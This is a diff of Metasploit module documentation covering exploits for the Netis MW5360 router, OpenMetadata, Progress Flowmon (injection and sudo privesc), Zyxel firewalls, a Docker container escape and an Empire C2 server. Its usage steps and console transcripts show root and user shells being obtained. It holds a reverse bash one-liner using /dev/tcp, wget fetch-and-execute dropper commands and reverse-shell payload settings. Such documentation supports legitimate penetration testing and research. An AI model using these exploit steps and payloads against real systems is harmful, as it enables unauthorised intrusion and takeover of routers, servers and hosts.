+msf6 exploit(linux/http/empire_skywalker) > set cve Original
+cve => Original
+msf6 exploit(linux/http/empire_skywalker) > set target 2
+target => 2
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
+payload => linux/x64/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/uuTqlfDp
+[*] Writing cron job to /etc/cron.d/frDtYnmD
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (38 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/frDtYnmD
+[+] Deleted /tmp/uuTqlfDp
+[!] Tried to delete /agent.log, unknown result
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900
+
+whoami
+root
+```
@@ -0,0 +1,240 @@
+## Vulnerable Application
+Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
+The vulnerability stems from improper handling of the `password` parameter within the router's web interface.
+The router's login page authorization can be bypassed by simply deleting the authorization header,
+leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.
+
+Attackers can inject a command in the `password` parameter, encoded in base64, to exploit the command injection vulnerability.
+When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
+to take full control of the router as user `root`.
+
+The following Netis network products are vulnerable:
+ - MW5360
+
+## Installation
+Ideally, to test this module, you would need a vulnerable GL.iNet device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+This module has been tested via FirmAE running on Kali Linux 2024.5 at the following emulated targets:
+* Netis router model MW5360 with  firmware V1.0.1.3442
+* Netis router model MW5360 with  firmware V1.0.1.3031
+* Netis router model MW5360 with  firmware RUSSIA_844
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the Netis devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* This requires additional [installation steps](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download  the vulnerable firmware from Netis [here](https://www.netisru.com/Suppory/de_details/id/1/de/136.html).
+* We will pick `MW5360-1.0.1.3442.bin` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d Netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin`
+* This will take a while, but in the end you should see the following...
+```shell
+ # ./run.sh -d netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin
+[*] /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+
+[IID] 118
+[MODE] debug
+[+] Network reachable on 192.168.1.1!
+[+] Web service on 192.168.1.1
+[+] Run debug!
+Creating TAP device tap118_0...
+Set 'tap118_0' persistent and owned by uid 0
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.1.1 true true 42.470578245 42.470578245
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - Netis_MW5360-1.0.1.3442
+[*] IP - 192.168.1.1
+[*] connecting to netcat (192.168.1.1:31337)
+[+] netcat connected
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+```
+* check if you can `ping` the emulated router and run `nmap` to check the ports
+```shell
+ # ping 192.168.1.1
+PING 192.168.8.1 (192.168.8.1) 56(84) bytes of data.
+64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=9.2 ms
+64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=3.18 ms
+^C
+--- 192.168.1.1 ping statistics ---
+2 packets transmitted, 2 received, 0% packet loss, time 1001ms
+rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
+ # nmap 192.168.1.1
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 10:16 UTC
+Nmap scan report for 192.168.1.1
+Host is up (0.0026s latency).
+Not shown: 997 filtered tcp ports (no-response)
+PORT    STATE SERVICE
+22/tcp  open  ssh
+80/tcp  open  http
+443/tcp open  https
+MAC Address: 00:E0:4C:81:96:C1 (Realtek Semiconductor)
+
+Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
+```
+You are now ready to test the module using the emulated router hardware on IP address 192.168.1.1.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/netis_unauth_rce_cve_2024_22729`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `Meterpreter` session.
+
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > info
+
+       Name: Netis router MW5360 unauthenticated RCE.
+     Module: exploit/linux/http/netis_unauth_rce_cve_2024_22729
+   Platform: Linux
+       Arch: mipsle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-01-11
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Adhikara13
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  CMD_DELAY  30               yes       Delay in seconds between payload commands to avoid locking
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.1.1      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
+                                        using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Netis MW5360 router endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. 
+                                      This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
+  The vulnerability stems from improper handling of the "password" parameter within the router's web interface.
+  The router's login page authorization can be bypassed by simply deleting the authorization header,
+  leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.
+  Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection
+  vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
+  to take control of the router.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-22729
+  https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729
+  https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md
+
+View the full module info with the info -d command.
+```
+## Options
+### CMD_DELAY
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking using the `CMD_DELAY` option.
+
+## Scenarios
+###  Netis MW5360 Router Emulation Linux Dropper -  linux/mipsle/meterpreter_reverse_tcp
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > set target 0
+target => 0
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > set rhosts 192.168.1.1
+rhosts => 192.168.1.1
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > set lhost 192.168.1.2
+lhost => 192.168.1.2
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.1:80 can be exploited.
+[+] The target appears to be vulnerable. Netis(MW5360)-V1.0.1.3442
+[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.1.2:8080/IbZMnLDC
+[*] Executing wget -qO /tmp/kgfXdZZW http://192.168.1.2:8080/IbZMnLDC
+[*] Client 192.168.1.1 (Wget) requested /IbZMnLDC
+[*] Sending payload to 192.168.1.1 (Wget)
+[*] Executing chmod +x /tmp/kgfXdZZW
+[*] Executing /tmp/kgfXdZZW
+[+] Deleted /tmp/kgfXdZZW
+[*] Meterpreter session 7 opened (192.168.1.2:4444 -> 192.168.1.1:43254) at 2024-05-19 11:51:21 +0000
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.1
+OS           :  (Linux 4.1.17+)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter > pwd
+/etc/boa
+meterpreter > ls
+Listing: /etc/boa
+=================
+
+Mode              Size     Type  Last modified              Name
+----              ----     ----  -------------              ----
+100755/rwxr-xr-x  9581     fil   2024-03-04 09:22:46 +0000  boa.conf
+100755/rwxr-xr-x  2118     fil   2024-03-04 09:22:46 +0000  mime.types
+
+meterpreter >
+```
+## Limitations
+Staged payloads might core dump on the target, so use stage-less payloads when using the Linux Dropper target.
+Another limitation is that the router has a very limited command set that can be leveraged,
+so the only option is to use the `wget` command to drop an executable on the target to get a session.
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking (see the `CMD_DELAY` option).
+
+Last but not least, be mindful that the admin router password gets overwritten by the exploit,
+resulting in a clear indicator of comprise.
@@ -0,0 +1,166 @@
+## Vulnerable Application
+
+OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository,
+in-depth lineage, and seamless team collaboration.
+This module chains two vulnerabilities that exist in the OpenMetadata application.
+The first vulnerability, [CVE-2024-28255](https://nvd.nist.gov/vuln/detail/CVE-2024-28255), bypasses the API authentication
+using JWT tokens. It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded endpoints
+that does not require authentication.
+Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the
+excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the
+authentication mechanism and reach any arbitrary endpoint.
+By chaining this vulnerability with [CVE-2024-28254](https://nvd.nist.gov/vuln/detail/CVE-2024-28254), that allows for
+arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`,attackers are able
+to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication.
+
+OpenMetadata versions `1.2.3` and below are vulnerable.
+
+The following releases were tested.
+* OpenMetadata 1.2.3 on Docker
+
+## Installation steps to install the OpenMedata running on Docker
+* Please follow these [installation instructions](https://docs.open-metadata.org/v1.3.x/quick-start/local-docker-deployment).
+* Please ensure that you download version 1.2.3 or below.
+* After successful installation your should be able to access OpenMetadata on port 8585 at `http://your_openmetadata_ip:8585`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/openmetadata_auth_bypass_rce`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ]  `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse netcat shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options
+
+## Scenarios
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info
+
+       Name: OpenMetadata authentication bypass and SpEL injection exploit chain
+     Module: exploit/linux/http/openmetadata_auth_bypass_rce
+   Platform: Unix, Linux
+       Arch: cmd
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-03-15
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Alvaro Muñoz alias pwntester (https://github.com/pwntester)
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Automatic
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+                                        html
+  RPORT      8585             yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI  /                yes       The URI path of the OpenMetadata web application
+  VHOST                       no        HTTP server virtual host
+
+Payload information:
+
+Description:
+  OpenMetadata is a unified platform for discovery, observability, and governance powered
+  by a central metadata repository, in-depth lineage, and seamless team collaboration.
+  This module chains two vulnerabilities that exist in the OpenMetadata aplication.
+  The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
+  It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
+  endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
+  to make any path contain any arbitrary strings that will match the excluded endpoint condition
+  and therefore will be processed with no JWT validation allowing an attacker to bypass the
+  authentication mechanism and reach any arbitrary endpoint.
+  By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
+  at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
+  are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
+  authentication.
+  OpenMetadata versions `1.2.3` and below are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-28255
+  https://nvd.nist.gov/vuln/detail/CVE-2024-28254
+A  https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/
+  https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255
+  https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/
+
+
+View the full module info with the info -d command.
+```
+### OpenMetadata 1.2.3 Automatic - cmd/unix/reverse_netcat_gaping
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping
+payload => cmd/unix/reverse_netcat_gaping
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42
+rhosts => 192.168.201.42
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
+[+] The target is vulnerable. Version 1.2.3
+[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
+[*] Command shell session 17 opened (192.168.201.8:4444 -> 192.168.201.42:55160) at 2024-07-29 15:27:38 +0000
+
+id
+uid=1000(openmetadata) gid=1000(openmetadata) groups=1000(openmetadata)
+pwd
+/opt/openmetadata
+uname -a
+Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux
+```
+### OpenMetadata 1.2.3 Automatic - cmd/linux/http/x64/meterpreter/reverse_tcp
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
+[+] The target is vulnerable. Version 1.2.3
+[*] Executing Automatic for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 192.168.201.42
+[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:50599) at 2024-07-31 14:31:37 +0000
+
+meterpreter > getuid
+Server username: openmetadata
+meterpreter > sysinfo
+Computer     : 172.16.240.4
+OS           :  (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/opt/openmetadata
+meterpreter >
+```
+## Limitations
+No limitations.
@@ -0,0 +1,91 @@
+## Vulnerable Application
+CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
+
+For more details on the vulnerability:
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is available in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection`
+1. Do: `set RHOSTS <target flowmon>`
+1. Do: `set RPORT <port flowmon is running on>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `flowmon` user.
+1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.
+
+## Scenarios
+
+### Progress Flowmon 12.2
+
+```
+msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
+
+Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PRIVESC    true             yes       Automatically try privesc to add sudo entry
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.174.209.101  yes       The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to Flowmon
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
+                                                  , WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      TkHAXYbQwlH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain space
+                                                  s
+   LHOST               138.111.211.11   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run
+
+[*] Started reverse TCP handler on 138.111.211.11:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 172.174.209.101:443 can be exploited!
+[*] Detected version: 12.02.06
+[+] The target is vulnerable. Version 12.02.06 is vulnerable.
+[*] Attempting to execute payload...
+[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000
+
+meterpreter > sysinfo
+Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: flowmon
+```
@@ -0,0 +1,60 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in order to obtain pre-auth command injection the multiple Zyxel device models.
+The exploit chain uses CVE-2023-33012 which is a command injection vulnerability which can be exploited when uploading a
+new configuration to /ztp/cgi-bin/parse_config.py by appending a command to the `option ipaddr ` field.
+
+The command injection is length limited to 0x14 bytes and is why this exploit chains a .qsr file write vulnerability as
+well in order to write the payload to a file which has no length limit and then call the payload with the command
+injection.
+
+Two caveats of this exploit chain were described by Jacob Baines in the following
+[blog post](https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot).
+1. In order for the target to be vulnerable Cloud Management Mode (SD-WAN mode) must be enable (it is not by default).
+2. The target can only be exploited once due to the order of operations in which the exploit functions.
+
+| Product                           | Affected Versions               |
+|-----------------------------------|----------------------------------|
+| ATP                               | V5.10 through V5.36 Patch 2      |
+| USG FLEX                          | V5.00 through V5.36 Patch 2      |
+| USG FLEX 50(W) / USG20(W)-VPN     | V5.10 through V5.36 Patch 2      |
+| VPN                               | V5.00 through V5.36 Patch 2      |
+
+### Setup
+
+To test this module you will need to acquire a hardware device running one of the vulnerable firmware versions listed above.
+
+## Options
+
+### WRITEABLE_DIR
+
+This indicates the location where you would like the payload and exploit stored, as well
+as serving as a location to store the various files and directories created by the exploit itself.
+The default value is `/tmp`
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use zyxel_parse_config_rce`
+1. Set the `RHOST` and `LHOST`
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### Mock USG Flex environment
+```
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set payload cmd/unix/generic
+payload => cmd/unix/generic
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set cmd id
+cmd => id
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set AllowNoCleanup true
+AllowNoCleanup => true
+msf6 exploit(linux/http/zyxel_parse_config_rce) > run
+
+[*] Attempting to upload the payload via QSR file write...
+[+] File write was successful.
+[+] Command output:
+uid=0(root) gid=0(root) groups=0(root)
+
+[!] This exploit may require manual cleanup of '/tmp/N.qsr' on the target
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+This module performs a container escape onto the host as the daemon user. It
+takes advantage of the SYS_MODULE capability. If that exists and the linux
+headers are available to compile on the target, then we can escape onto the host.
+
+### Creating A Testing Environment
+
+- Get a VM that you want to test on (or your own machine)
+- Install Docker
+- Run a listener (can be anything but this example will make use of the msfconsole `cmd/unix/reverse_bash` payload)
+```msf
+msf6 > use payload/cmd/unix/reverse_bash
+msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0 
+lhost => 192.168.56.1
+msf6 payload(cmd/unix/reverse_bash) > generate -f raw
+bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
+msf6 payload(cmd/unix/reverse_bash) > exploit -z
+[*] Payload Handler Started as Job 0
+msf6 payload(cmd/unix/reverse_bash) > 
+[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444
+```
+- Create a privileged container (forwarding port 4444 in this example in order
+to use a bind shell from the host. Container must be the same OS as host)
+```bash
+docker run --rm -it --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
+```
+- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example
+```bash
+apt update && apt install -y gcc make kmod linux-headers-$(uname -r)
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Install required packages into session (line 30)
+4. Run `use exploit/linux/local/docker_privileged_container_kernel_escape`
+5. Run `set SESSION [session]`
+6. Run `check`
+7. Run `set PAYLOAD [payload]`
+8. Run `exploit`
+
+## Options
+
+### KernelModuleName
+
+The name that the kernel module will be called in the system. The default if no
+name is set is "{rand(8)}"
+
+### WritableContainerDir
+
+A directory where we can write files inside the container (default is `/tmp/.{rand(4)}`).
+This is needed to drop the payload into the container.
+
+### ReloadKernelModule
+
+Rebuilds and reloads kernel module if its already loaded in case of repeat runs.
+
+## Scenarios
+
+### Container Escape from debian linux with reverse bash
+
+```msf
+msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)"
+[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126)
+msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1 
+session => 1
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check 
+[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
+
+[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 
+[*] [2023.11.07-21:42:42] Creating files...
+[*] [2023.11.07-21:42:43] Compiling the kernel module...
+[+] [2023.11.07-21:42:43] Kernel module compiled successfully
+[*] [2023.11.07-21:42:43] Loading kernel module...
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
+[*] This is CredCollect, I have the conn!
+```
+
+### Container Escape from arch linux with meterpreter
+
+```msf
+msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers"
+[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106)
+msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2 
+session => 2
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0 
+lhost => vboxnet0
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check 
+[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
+
+[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 
+[*] [2023.11.07-21:48:41] Creating files...
+[*] [2023.11.07-21:48:43] Compiling the kernel module...
+[+] [2023.11.07-21:48:44] Kernel module compiled successfully
+[*] [2023.11.07-21:48:44] Loading kernel module...
+[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
+[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
+[*] This is CredCollect, I have the conn!
+[*] Session 4 created in the background.
+```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the
+`flowmon` user to `root`. This is possible due to the
+flowmon user being able to run several commands with
+`sudo`. This module exploits the ability to overwrite a
+PHP file and execute it with `sudo` granting full `sudo`
+permissions to the `flowmon` user and elevating the
+shell to a root shell.
+
+For more details on the vulnerability:
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is avaiable in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `flowmon` user
+1. Do: `use exploits/linux/local/pprogress_flowmon_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### Flowmon 12.2
+
+```
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                                  Connection
+  --  ----  ----                   -----------                                  ----------
+  5         meterpreter x64/linux  flowmon @ localhost.localdomain.localdomain  192.168.2.23:4444 -> 192.168.2.26:38328 (192.168.2.26)
+
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_flowmon_sudo_privesc_2024):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   SESSION       -1               yes       The session to run this module on
+   WRITABLE_DIR  /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.2.23     yes       The listen address (an interface may be specified)
+   LPORT  5555             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
